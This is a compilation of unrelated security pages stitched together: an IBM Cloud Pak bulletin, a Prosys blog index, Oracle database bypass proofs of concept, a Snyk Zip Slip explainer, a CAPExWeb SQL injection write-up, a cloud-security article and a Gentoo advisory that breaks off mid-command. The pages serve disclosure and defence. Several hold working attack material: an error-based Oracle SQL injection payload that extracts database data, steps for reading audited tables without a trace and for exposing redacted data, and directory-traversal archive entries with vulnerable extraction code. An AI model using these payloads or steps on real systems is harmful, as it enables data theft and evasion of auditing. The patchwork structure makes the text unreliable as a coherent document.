IBM Business Automation Workflow 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, and 22.0.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 238054.

**Security Bulletin**

  

**Summary**

In addition to many updates of operating system level packages, the following security vulnerability is addressed with IBM Cloud Pak for Business Automation 21.0.3-IF016 and 22.0.1-IF006.

**Vulnerability Details**

**CVEID:**   CVE-2017-10355  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE related to the Java SE, Java SE Embedded, JRockit Networking component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/133784 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-42920  
**DESCRIPTION:**   Apache Commons BCEL could allow a remote attacker to bypass security restrictions, caused by an out-of-bounds write flaw in the APIs. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain control over the resulting bytecode than otherwise expected.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239562 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-2047  
**DESCRIPTION:**   Eclipse Jetty could allow a remote authenticated attacker to bypass security restrictions, caused by a flaw in the HttpURI class. By sending a specially-crafted request, an attacker could exploit this vulnerability to the HttpClient and ProxyServlet/AsyncProxyServlet/AsyncMiddleManServlet wrongly interpreting an authority with no host as one with a host.  
CVSS Base score: 2.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/230668 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2022-42435  
**DESCRIPTION:**   IBM Business Automation Workflow is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238054 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Status

IBM Cloud Pak for Business Automation

V22.0.1 - V22.0.1-IF005

affected

IBM Cloud Pak for Business Automation

V21.0.3 - V21.0.3-IF015

affected

IBM Cloud Pak for Business Automation

V21.0.2 - V21.0.2-IF012 and later fixes  
V21.0.1 - V21.0.1-IF007 and later fixes  
V20.0.1 - V20.0.3 and later fixes  
V19.0.1 - V19.0.3 and later fixes  
V18.0.0 - V18.0.2 and later fixes

affected

  

**Remediation/Fixes**

Any open source library may be included in one or more sub-components of IBM Cloud Pak for Business Automation. Open source updates are not always synchronized across all components. The CVE in this bulletin are specifically addressed by

CVE ID

Addressed in component

CVE-2022-2047

Operational Decision Management component

CVE-2022-42435

Business Automation Workflow Component

CVE-2017-10355

Automation Decision Service Component

CVE-2022-42920

Business Automation Workflow / Workflow Process Service / Business Automation Studio

Affected Product(s)

Version(s)

Remediation / Fix

IBM Cloud Pak for Business Automation

V22.0.1 - V22.0.1-IF005

Apply security fix 22.0.1-IF006

IBM Cloud Pak for Business Automation

V21.0.3 - V21.0.3-IF015

Apply security fix 21.0.3-IF016 or upgrade to 22.0.1-IF006

IBM Cloud Pak for Business Automation

V21.0.1 - V21.0.1-IF008  
V20.0.1 - V20.0.3  
V19.0.1 - V19.0.3  
V18.0.0 - V18.0.2

Upgrade to 21.0.3-IF016 or 22.0.1-IF006

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by Man Shum, https://www.linkedin.com/in/man-shum/

**Change History**

30 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS2JQC","label":"IBM Cloud Pak for Automation"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"18.0.0, 18.0.1,18.0.2,19.0.1,19.0.2,19.0.3,20.0.1,20.0.2,20.0.3,21.0.1,21.0.2,21.0.3,22.0.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSBYVB","label":"IBM Cloud Pak for Business Automation"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"18.0.0, 18.0.1,18.0.2,19.0.1,19.0.2,19.0.3,20.0.1,20.0.2,20.0.3,21.0.1,21.0.2,21.0.3,22.0.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-42435: Security Bulletin: Security vulnerabilities are addressed with IBM Cloud Pak for Business Automation iFixes for December 2022

Prosys OPC UA Simulation Server version prior to v5.3.0-64 and UA Modbus Server versions 1.4.18-5 and prior do not sufficiently protect credentials, which could allow an attacker to obtain user credentials and gain access to system data.

16.12.2021

**OPC UA Manufacturing Gateway Demo**

OPC UA Manufacturing Gateway features OPC UA PubSub UDP and MQTT as well as OPC UA Process Automation Device Information Model (PA-DIM)

14.12.2021

**OPC UA PubSub Explained**

OPC UA PubSub is a new alternative communication model in addition to the traditional Client/Server model.

12.10.2018

**Getting Started with OPC UA (Videos)**

Watch the short videos to get a quick overview of how to get started with OPC UA end-user products or with development. They are represented by Jouni Aro, the CTO of Prosys OPC.

02.08.2016

**Oracle database with embedded OPC UA**

Oracle has recently endorsed OPC UA in its reference IoT (Internet of Things) architecture. In this solution OPC UA acts as a bridge between plant devices and plant management layers. In our recent customer case we integrated our Java OPC UA client directly with the Oracle database handling the plant data, enabling

24.06.2014

**Hadoop and Hive integration with OPC UA**

The big data seems to be the talk of the town at the moment. Enterprises in various fields are utilizing the concept, or at least say they do. This blog post tries to shed some light on the murky concept, along with introducing a demo case of Hadoop and OPC UA integration.

08.05.2014

**OPC UA in the Internet of Things**

The idea of connecting things other than dedicated computing devices to the Internet is by no means new. Various examples such as remotely controlled coffeemakers or refrigerators reporting their contents have circulated for several decades, but up until recently they have been little more than anecdotal in nature.

07.04.2014

**Opening Day at Hannover Messe**

It is the opening day for Hannover Messe, and yes it is a good day for us. There is definitely an increasing demand for Java based OPC UA tools and applications.

03.04.2014

**Information modeling features in the upcoming UA SDK**

The release of the 2.0 version of our Java SDK is just around the corner. In the new version, we are introducing new features that should help you to use information models in your UA applications.

11.02.2014

**Simulation Server Beta**

Prosys OPC UA Java Server has gone through major rework/development to become Prosys OPC UA Simulation Server.

20.12.2013

**OPC UA 1.02**

The OPC Foundation has recently released the version 1.02 of the specification and the stack components along with some sample applications and a new version of the Local Discovery Server (LDS).

04.12.2013

**GM applying OPC UA in production**

General Motors have given a presentation at the ARC World Industry Forum about their new MES/automation link, which they have based on OPC UA.

14.08.2013

**Raspberry Pi + Java SDK based OPC UA weather station**

We often get questions about developing to ARM platform using our Java SDK. This has been proven to be possible by our QEMU + ARM test setup. We decided that it would be nice to have also some demo running on real hardware.

20.05.2013

**OPC Day Europe 2013**

Yokogawa hosted the third annual OPC Day Europe in their European headquarters in Amersfoort, the Netherlands. Yokogawa provided great facilities for the event that gathered up 150 OPC enthusiasts from all over the Europe.

19.04.2013

**QEMU + ARM test setup**

From time to time we get inquiries regarding OPC UA server and client application suitability and performance on ARM platforms. This blog post is intended to serve as a starting point for users interested in testing Prosys Java applications on ARM platform virtual machine.

19.04.2013

**Prosys OPC at Hannover Messe**

Prosys OPC attended Hannover Messe 2013 in the second week of April. The leading industrial trade show in Europe gathered up 6 550 exhibitors from 62 nations and total of 225 000 attendees.

01.02.2013

**New OPC UA Applications**

Three new OPC UA products were released this week: OPC UA Java Client, OPC UA Android Client and OPC UA Java Server, all of them developed with the best OPC UA SDK in the market: Prosys OPC UA Java SDK.

16.01.2013

**Custom UA Enum Types in Java SDK**

Creating your own enumeration type and using it the server is not as straight forward as it first seems, but it is not very complicated either. You just need to get it done right.

04.12.2012

**Prosys OPC at SPS/IPC/Drives 2012**

Prosys OPC attended SPS/IPC/Drives 2012 in Nuremberg, Germany last week. The three-day exhibition gathered up almost 57 000 visitors and 1 458 exhibitors, Prosys OPC being one of the exhibitors at OPC Foundation booth.

28.11.2012

**OPC UA For ISA95**

The OPC Foundation has been developing several companion specifications to the OPC UA. One of these is OPC UA For ISA95, which is reaching the Release Candidate phase already.

16.11.2012

**Prosys OPC at IAS 2012, Shanghai**

Prosys OPC attended Industrial Automation Show 2012 in Shanghai China last week. During the five-day exhibition approximately 100 000 visitors had a change to take a look what’s going on in the various fields of industrial automation, introduced by more than 500 exhibitors.

15.10.2012

**OPC and MES Day & OPC UA Workshop 2012**

The annual OPC Day Finland was held for the 8th time last week on Tuesday. For the first time in its history it was organized with MES people, combining both OPC and MES tracks.

11.09.2012

**OPC UA & Wireshark**

Wireshark is a great tool for sniffing network traffic. It contains several pre-defined filters for various protocols – and yes, also OPC UA!

12.07.2012

**Using Complex DataTypes**

One of the great things in OPC UA is that when the base information models don’t fit your needs quite well enough, there are many options to extend the specifications. One common case where it’s nice to be able to extend the base spec is with Complex DataTypes.

29.05.2012

**OPC Day Europe 2012**

Prosys was sponsoring OPC Day Europe 2012 in Reinach, Switzerland on May 16th. The first OPC Day Europe was held in 2011, thus this year OPC Day Europe was organized for the second time and hosted by Endress+Hauser.

24.04.2012

**Connecting OPC Classic to OPC UA with OPC UA Gateway**

We get frequent questions about how to use OPC Unified Architecture in conjunction with OPC Classic servers. Regardless of the new technical details of OPC UA, we cannot get around the fact that majority of the communication systems worldwide are still running OPC Classic servers.

24.02.2012

**Developing OPC UA for Android**

I thought I’d share a few pointers about developing OPC UA on Android, since our Prosys OPC UA Java SDK has supported Android from version 1.3 onwards.

26.01.2012

**OPC UA Sessions, Subscriptions and Timeouts**

In this article I will try to clarify all the various parameters of OPC UA communications, especially related to the various timeouts that are available. They provide a flexible means to control the connection between the UA client and server, both on the client and server side, but it is not always very clear which parameter is which and what is the actual effect of each.

CVE-2022-2967: Blog - Prosys OPC

Proof of concept overview on how the DBMS_REDACT Dynamic Data Masking security feature in Oracle can be bypassed. Affected versions include 19c and 21c.

    Title: ByPassing DBMS_REDACT Dynamic Data Masking security feature in Oracle database systemProduct:                   DatabaseManufacturer:              OracleAffected Version(s):       19c,21cTested Version(s):         19c,21cCVE Reference:             N/AAuthor of Advisory:        Emad Al-MousaOverview:DBMS_REDACT package provides an interface to Oracle Data Redaction, which enables you to mask (redact) data that is returned from SQL queries. Basically, its dynamic data masking. security policies are configured and enabled through dbms_redact package. This is a security feature but doesn't provide a bullet proof data protection, as I will simulate how easily it can be bypassed and masked datacan be extracted/viewed.**************************************************Proof of Concept (PoC):In the database I will create a table called HR.TABLE2 and will create an index on SALES column and insert dummy tables.SQL> CREATE TABLE HR.TABLE2(  COMPANY_NAME  VARCHAR2(10 BYTE),  REGION   VARCHAR2(10 BYTE),  SALES      NUMBER(12),  DIVISION_NAME VARCHAR2(12)); SQL> CREATE INDEX HR.IDX_TABLE2_SALES ON HR.TABLE2(SALES);SQL> Insert into HR.TABLE2 values ('COMPANY_A','EU',120000000,'INDUSTRIAL');SQL> Insert into HR.TABLE2 values ('COMPANY_B','ASIA',170000000,'RETAIL');SQL> Insert into HR.TABLE2 values ('COMPANY_C','ME',40000000,'SHIPMENT');SQL> Insert into HR.TABLE2 values ('COMPANY_D','AFRICA',11000000,'FARMING');SQL> Insert into HR.TABLE2 values ('COMPANY_E','LATIN-AM',114000000,'SHIPMENT');SQL> Insert into HR.TABLE2 values ('COMPANY_F','NORTH-AM',190000000,'RETAIL');SQL> commit;I will create a redaction policy as SYS user against “SALES” column in the table HR.TABLE2:sqlplus / as sysdbaSQL> begin       dbms_redact.add_policy(       object_schema => 'HR',       object_name   => 'TABLE2',       column_name   => 'SALES',       policy_name   => 'REDACT_HR_SALES',       function_type => DBMS_REDACT.FULL,       expression    => '1=1');  end;/ I will create a user called "roro" in the pluggable database ORCLPDB1 with “create session” and "SELECT" permission ONLY on the table:sqlplus / as sysdbaSQL> alter session set container=ORCLPDB1;SQL> create user roro identified by dummy_123;SQL> grant select on HR.TABLE2 to roro;connecting using account roro to the database using "SQL Developer Tool" or SQLCL and execute the following command:info+ HR.TABLE2;The histogram data for SALES column will show the actual vaules stored in the redacted column.Conclusion: So the security feature was bypassed with no excessive privileges required to be granted to the database account, I utilized the info+ command only.**************************************************References:https://docs.oracle.com/database/121/ASOAG/introduction-to-oracle-data-redaction.htm#ASOAG852https://databasesecurityninja.wordpress.com/2023/01/03/bypassing-dbms_redact-dynamic-data-masking-security-feature-in-oracle-database-system/Thanks,Emad

Oracle DBMS_REDACT Dynamic Data Masking Bypass

Oracle versions 12.1.0.2, 12.2.0.1, and 19c suffer from a Unified Audit Policy bypass vulnerability.

    Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPassProduct:                   DatabaseManufacturer:              OracleAffected Version(s):       12.1.0.2, 12.2.0.1, 19cTested Version(s):         19cRisk Level:                lowSolution Status:           FixedManufacturer Notification: 2021-03-17Solution Date:             2021-10-17Public Disclosure:         2022-06-11CVE Reference:             CVE-2021-35576Author of Advisory:        Emad Al-MousaOverview:Oracle Database is a general purpose relational database management system (RDMBS).Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources.The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role.*****************************************Vulnerability Details:The vulnerability will allow database administrator or system admin with access to the database server (either local login or remote authentication)to bypass a custom in-place audit policy defined in the oracle database system. Moreover, setting the database in upgrade mode will disable auditingand threat actor can perform malicious operations without detection.*****************************************Proof of Concept (PoC):I will create a table in pluggable database PDB1 under HR schema and insert few records:SQL> CREATE TABLE HR.EMPLOYEE(  FIRST_NAME  VARCHAR2(50),  LAST_NAME   VARCHAR2(50));SQL> INSERT INTO HR.EMPLOYEE (   FIRST_NAME, LAST_NAME)VALUES ( 'EMAD','MOUSA' );SQL> commit;SQL> INSERT INTO HR.EMPLOYEE (   FIRST_NAME, LAST_NAME)VALUES ( 'SAMI','MOUSA' );SQL> commit;I will now create audit policy:SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;SQL> audit policy SELECT_P1;To check audit policies configured in PDB1 database:SQL> SELECT * FROM audit_unified_enabled_policies;Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode:sqlplus / as sysdbaSQL> alter session set container=PDB1;SQL> shutdown immediate;SQL> startup upgrade;SQL> select * from HR.EMPLOYEE;SQL> startup force;SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;Checking the audit logs using the query, NO entry is found recorded in the unified audit trail:SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc;So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view !*****************************************References:https://www.oracle.com/security-alerts/cpuoct2021.html https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/https://nvd.nist.gov/vuln/detail/CVE-2021-35576Credit:Emad Al-Mousa: CVE-2021-35576

Oracle Unified Audit Policy Bypass

Due to improper path santization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory.

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand crafted and shared among developer communities such as StackOverflow.

The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.sh). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. If you’d like the information on this page in a downloadable technical white paper, click the button below.

Download Technical White Paper

Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive. The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.

**Exploitable Application Flow**

The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking. Let’s look through each of these in turn. First of all, the contents of the zip file needs to have one or more files that break out of the target directory when extracted. In the example below, we can see the contents of a zip file. It has two files, a good.sh file which would be extracted into the target directory and an evil.sh file which is trying to traverse up the directory tree to hit the root and then add a file into the tmp directory. When you attempt to cd .. in the root directory, you still find yourself in the root directory, so a malicious path could contain many levels of ../ to stand a better chance of reaching the root directory, before trying to traverse to sensitive files.

           
  5 Tue Jun 5 11:04:29 BST 2018 good.sh 20 Tue Jun 5 11:04:42 BST 2018 ../../../../../../../../tmp/evil.sh
          
  

The contents of this zip file have to be hand crafted. Archive creation tools don’t typically allow users to add files with these paths, despite the zip specification allowing it. However, with the right tools, it’s easy to create files with these paths.

The second thing you’ll need to exploit this vulnerability is to extract the archive, either using your own code or a library. The vulnerability exists when the extraction code omits validation on the file paths in the archive. An example of a vulnerable code snippet (example shown in Java) can be seen below.

     
  1   Enumeration<ZipEntry>entries = zip.getEntries(); 
  2   while (entries.hasMoreElements()) { 
  3       ZipEntry e = entries.nextElement(); 
  4       File f = new File(destinationDir, e.getName()); 
  5       InputStream input = zip.getInputStream(e); 
  6       IOUtils.copy(input, write(f)); 
  7   }
          
  

You can see on line 4, e.getName() is concatenated with the target directory, dir, without being validated. At this point, when our zip archive gets to our evil.sh, it will append the full path (including every ../) of the zip entry to the target directory resulting in evil.sh being written outside of the target directory.

To see Zip Slip in action,

watch us exploit the vulnerable java-goof application

, a sample application used to show many known vulnerabilities.

**Are you Vulnerable?**

You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation. Snyk is maintaining a GitHub repository listing all projects that have been found vulnerable to Zip Slip and have been responsibly disclosed to, including fix dates and versions. The repository is open to contributions from the wider community to ensure it holds the most up to date status.s.

**What action should you take?**

Here are some steps you can take to check if your project’s dependencies of code contain the Zip Slip vulnerability:

**1\. Search through your projects for vulnerable code.**  

Expand this section

Groovy

Expand this section

JavaScript

Expand this section

Ruby & Python

**2\. Add Zip Slip Security Testing to your application build pipeline**

If you’d prefer not to search through your direct and transitive dependencies (of which you likely have hundreds) to determine if you’re using a vulnerable library, you can choose a dependency vulnerability scanning tool, like Snyk. It’s a good practice to add security testing into your development lifecycle stages, such as during development, CI, deployment and production. You can test your own projects (all the ecosystems mentioned above are supported) to determine if they are vulnerable to Zip Slip.

**Other vulnerable projects**

Vulnerable projects include projects in various ecosystems that either use the libraries mentioned above or directly include vulnerable code. Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarQube, OpenTable, Arduino, ElasticSearch, Selenium, JetBrains and Google.

**Thank you!**

The Snyk security team would like for thank all the vendors, project owners and the community members that helped raise awareness, find and fix vulnerabilities in projects across many ecosystems.

CVE-2020-36566: Snyk Vulnerability Database | Snyk

Shilpi CAPExWeb 1.1 allows SQL injection via a servlet/capexweb.cap_sendMail GET request.

**Description**

The GET request parameters in servlet/capexweb.cap\_sendMail are vulnerable to SQL Injection. An unauthenticated user can take over the database of the application.

**Proof of concept: (POC)**

The following vulnerability was tested on CAPExWeb version 1.1 Product.

1.  Visit the /capexweb/capexweb URI on the server where the capexweb client is installed.
    

_**Figure-1:** Default login page of the application._

1.  Now, fill the login form with the wrong details and submit them.
    

_**Figure-2:** Login form with invalid credentials._

_**Figure-3:** Response shows the credentials are invalid._

2.  From the error response, click on the “Forgot My User id or Password” link. 
    

Note: We cannot navigate to the capforgotpassword.jsp directly, as the application takes the user id from the previously submitted request.

_**Figure-4:** Response shows user-id as null if we navigate to capforgotpassword.jsp directly._

_**Figure-5:** Forgot password page with user-id value submitted in the login page. Now, click on the send request button._

3.  The browser sends the following request to the server.
    

_**Figure-6:** Forgot password request_

_**Figure-7:** Response from the server for invalid user id._

_**Figure-8:** Replay of forgot password page with user-id value containing a single quote returns ORA string not properly terminated error message from the database._

_**Figure-9:** Replay of forgot password page with user-id value containing two quotes returns valid error message from the application._

_**Figure-10:** Replay of forgot password page with user-id value contains comments to truncate the query after user-id returns missing right parenthesis from the database server._

_**Figure-11:** Replay of forgot password page with user-id value contains a single quote and right parenthesis returns quoted string not properly terminated error message from the database server._

_**Figure-12:** Replay of forgot password page with user-id value contains a single quote, right parenthesis, and comment returns missing right parenthesis error message from the database server._

**Note:** After analyzing the responses for different payloads, the payload needs two right parentheses to work.

_**Figure-13:** Replay of forgot password page with user-id value contains a single quote, two right parentheses, and comment returns a valid error message from the application._

**Note:** The proper execution of functionality sends an email or SMS to the user. In production servers, checking this issue may impact all the users. As we do not have a valid user id, trying for always real conditions impacts all the users in the application. So, to minimize the impact on one user, use the ROWNUM condition.

_**Figure-14:** Request with ROWNUM condition as part of the payload._

_**Figure-15:**  User id value with always true condition and ROWNUM condition does not show invalid user id or pan._

_**Figure-16:** The payload XORXX’)) or%201=ctxsys.drithsx.sn (1, (select%20sys.stragg(distinct%20banner)%20from%20v$version))-- in request to retrieve the data from the database in error information._

_**Figure-17:** The available databases in the Oracle database server._

**Impact**

A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

**Remediations**

Use parameterized queries when dealing with SQL queries that contain user input. Parameterized queries allow the database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.

**Timeline**

 **July 01, 2020** - Discovered in our research lab

 **July 17, 2020** \- Followed up with the Vendor

 **July 29, 2020** - Followed up with the Vendor

 **October 7, 2020** -  Informed CERT-in about the vulnerability

 **November 27, 2020** - CERT-in confirmed the vulnerability fix

**Discovered by**

Cyber Security Works Pvt. Ltd.

CVE-2020-24600: 2020-24600 - SQL Injection in CAPExWeb

An issue was discovered in illumos before f859e7171bb5db34321e45585839c6c3200ebb90, OmniOS Community Edition r151038, OpenIndiana Hipster 2021.04, and SmartOS 20210923. A local unprivileged user can cause a deadlock and kernel panic via crafted rename and rmdir calls on tmpfs filesystems. Oracle Solaris 10 and 11 is also affected.

☹

Sorry, your browser does not support the technologies needed to use our web interface. Please make sure you have the latest version, and that JavaScript is enabled.

CVE-2021-43395: Topicbox

Organizations can start by integrating functions like detection, prioritization, and remediation on to a single platform.

Cloud transformation often occurs simultaneously across siloed organizational units and groups, each potentially using a different cloud for their applications and workloads. However, taking inventory of all their cloud resources and building a compliant, secure, simple, and unified strategy has become a common challenge.

It wouldn’t be surprising to see an organization with most of its workloads in AWS using Microsoft 365 and Azure Active Directory while also heavily using Google Cloud GKE and Big Query. On top of that, Oracle Cloud may also be in the mix with some autonomous database offerings. As cloud adoption matures in an organization, and as smaller cloud providers gain traction, the mix of services and cloud platforms becomes incredibly diverse and complex. In light of these challenges, organizations must still find ways to govern and secure their entire cloud infrastructure.

The answer? A framework that works across all clouds to unify detection, prioritization, and remediation of the most impactful risks facing the organization.

****Identities and Authentication Keys****

Diving into a use case around cloud identity authentication keys for access, let’s see how you can protect your organization’s crown jewels in your multicloud environment. In the cloud world, identity is perhaps the most critical cloud object to govern, monitor, detect, and remediate. Compromising a cloud identity has the largest blast radius since, frankly, the public cloud is just a bunch of public APIs that respond to authenticated requests.

Authentication keys are cryptographic entities attached to an identity that allow you to issue authenticated API requests from the Internet. Hence, these keys call for the undivided attention of any governance and security strategy. However, each cloud provider defines identity in a different way, with a completely new set of capabilities and risks.

    

The idea here is to think of an organization that wants to enforce the following policy: “Authentication keys should be rotated every 90 days, and every 30 days if they enable personally identifying information access.” This seemingly simple policy would need to take four different implementations, depending on which cloud it’s using. Additionally, the security admin would need to tailor specific policies, such as limiting the number of concurrent keys (not relevant to AWS) or enforcing expiration dates upon key creation (not relevant for secrets).

The same concept applies when an organization tries to enforce “do not allow public access to storage objects” or “only build workloads from images that are up to date.”

****Building, Securing, and Governing the Cloud****

While each cloud is unique, foundationally, they are not so different. They all have a concept of a computer instance, object and file storage, and both human and nonhuman identities, each of which can be assigned permissions. As a result, the multicloud infrastructure calls for unification between building, securing, and governing the cloud.

When building cloud deployments, organizations rely on infrastructure as code (IaC) languages like HashiCorp’s Terraform to create a unified approach to address cloud objects. Think of IaC as a higher-level language over the lower-level cloud-specific API calls.

The parallel higher-level language for securing and governing the cloud is the cloud-native application protection platform (CNAPP). CNAPP converges tools like cloud security posture management, cloud infrastructure entitlement management, cloud workload protection platform, configuration management database, and others, providing complete security for your cloud, spanning the cloud development lifecycle from build time to run time. CNAPP provides a single pane of glass for all your cloud environments.

These solutions provide a complete inventory of your cloud assets, as well as visibility into potential security gaps and risks, correlating across a broad range of signals including misconfigurations, vulnerabilities, Internet exposure, excessive permissions, and more.

Through a CNAPP, teams can enable unified detection, investigation, and enforcement of common cloud objects, as well as pitfalls such as exposed storage, unpatched compute instances, and more. Ideally, a single UI workflow allows you to enforce multicloud organization policies such as “block public access for cloud storage” or “isolate compute instances that accept traffic from the Internet and expose a service with critical vulnerabilities.”

Here are additional best practices and recommendations for securing your cloud footprint:

*   Decide whether to measure against a security framework like NIST or CIS, or your own internally developed policies. Implement these policies across the development lifecycle, with explicit definition of where to enforce action-blocking guardrails. A CNAPP can help you accomplish this.
*   Ensure your security team is diversified in terms of multicloud knowledge, e.g., AWS, Azure, and GCP.
*   Implement identity best practices, such as single sign-on and multifactor authentication, via your organization’s existing IAM provider, whenever possible. Avoid the use of cloud-specific local identities to access the cloud from the Internet.
*   Define the unified view as a prerequisite for procurement of cloud security tools. Ideally, choose tools that enable a unified approach of enforcing organizational policies across clouds.

Cloud transformation has become a vital initiative for many organizations. As you go through the cloud transformation journey, remember that your approach to security (and the tools you use) must transform as well. Whether you’re unifying siloed tools, security and DevOps teams, different cloud vendors, management, or policies and languages, bringing tools together and enforcing commonalities will benefit your organization in the long run.

Read more _Partner Perspectives_ from Zscaler.

Best Practices for Securing and Governing Your Multicloud Deployment

Gentoo Linux Security Advisory 202212-3 - Multiple vulnerabilities have been discovered in Oracle Virtualbox, the worst of which could result in privilege escalation from a guest to the host. Versions less than 6.1.40 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202212-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Oracle VirtualBox: Multiple Vulnerabilities  
     Date: December 19, 2022  
     Bugs: #877601  
       ID: 202212-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Oracle Virtualbox, the  
worst of which could result in privilege escalation from a guest to the  
host.

Background  
=========  
VirtualBox is a powerful virtualization product from Oracle.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-emulation/virtualbox         < 6.1.40              >= 6.1.40  
  2  app-emulation/virtualbox-modules < 6.1.40              >= 6.1.40

Description  
==========  
Multiple vulnerabilities have been discovered in Oracle VirtualBox.  
Please review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Oracle VirtualBox users should upgrade to the latest version:

  # emerge --sync  
